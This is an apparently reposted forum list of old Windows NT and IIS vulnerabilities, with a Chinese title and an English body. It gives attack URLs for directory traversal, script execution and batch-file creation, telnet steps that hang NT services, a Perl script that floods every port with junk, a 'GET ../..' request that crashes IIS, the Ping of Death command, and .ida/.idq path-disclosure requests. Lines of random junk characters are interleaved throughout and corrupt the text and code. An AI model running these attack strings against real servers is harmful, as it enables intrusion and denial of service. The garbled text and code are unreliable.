NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
3 h2 Z/ K, q4 U  B0 U
. s* i+ Z; d, XA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

! g' H( ^7 C- N" iBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

6 v% U/ B* {! |& W) C+ X4 p: b--------------------------------------------------------------------
$ s' x7 P4 b, l" s
0 f5 r* e. [7 K2 w. F) q受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
! n* J# m' D) K- l( W( X
If the file 'target.bat' exists, the file will be truncated.

+ c4 H; W- K7 j$ [
2 n5 i; G. l' T1 ?3 W- w  K" CA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

* E! w: N. Q, {5 H' w. @7 y1 s3 l0 f----------------------------------------------------------------------
+ O# H% b6 u: y! \7 Z
4 A1 t* U4 ~1 |8 s+ m; `0 h受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
: J4 v1 _. f! w
& Q' E1 H" [6 `7 I$ s  PThe following steps;
' M4 O4 V% c5 j- H
Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
# Z! S: `! ]( }) r6 T4 eExit Telnet
1 v- o" [/ A7 L+ ^# a1 w" Sresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
- R2 X9 V. G& c, |, w4 K: a
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
4 C- V5 F+ ?4 f' D# k
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
: _) Y, b* ^: k- `9 v5 {0 l& `
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

& K8 z, U+ I7 uThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/

use Socket;
+ c5 o" }) `5 X5 W, }- Ause FileHandle;
0 w# s# P( X- d3 B' q* t( Yrequire "chat2.pl";

$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
& F0 |  T% R% M$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
6 E; L: p, b& C/ N" \. J3 r{
) Y: ?. b; T4 r6 r" b* a6 l$ n  s0 w6 t

if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
7 ^$ i& r4 W# Z; y5 b1 R# d}
; o1 k% d7 u2 _4 m$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
, Z9 @6 _& z% q1 z  z5 B}
chat::close($fh);
$ i1 m$ a8 ~0 |: d8 E% q
}
7 b  e7 w; g% A+ F( ]
& i5 \2 j0 o1 i
3 D1 E" f  e0 n/*end poke code*/

7 _/ Z, Z6 ^. h' a/ l/ RSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

0 I4 [8 t: p3 g9 k" [受影響系統(tǒng):4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
; V( `# Y' c4 o2 [  |$ @& u+ m
2 |+ u. I8 D/ k4 w--------------------------------------------------------------------------------
1 L# u) ^* V1 O) P; o
受影響系統(tǒng):3.51,4.0
6 X6 X; H4 u! o% dLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
: D9 o0 [0 U2 n% P/ N) s3 m
STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
2 s2 W# v2 K/ K* n, v2 ?
5 z5 y9 [4 v& U- K* S3 s+ O/ @-OR-

3 ~9 o. j: F" o& s8 dSTOP: 0x0000000A
! @. w6 k& ~0 a" qIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
0 `# O  \* \5 J4 }" G8 a  C
--------------------------------------------------------------------------------
! n, ]6 L' ^2 D0 L- P/ ]- S
6 {, B- ]$ Y4 u( AMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
7 |8 ^1 V; ?7 K+ [, T$ K+ _
3 ^; D8 i' g  u. p/ [--------------------------------------------------------
, o. W+ R# I7 p6 U
3 l; d# i* f* Y" |- W( |IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server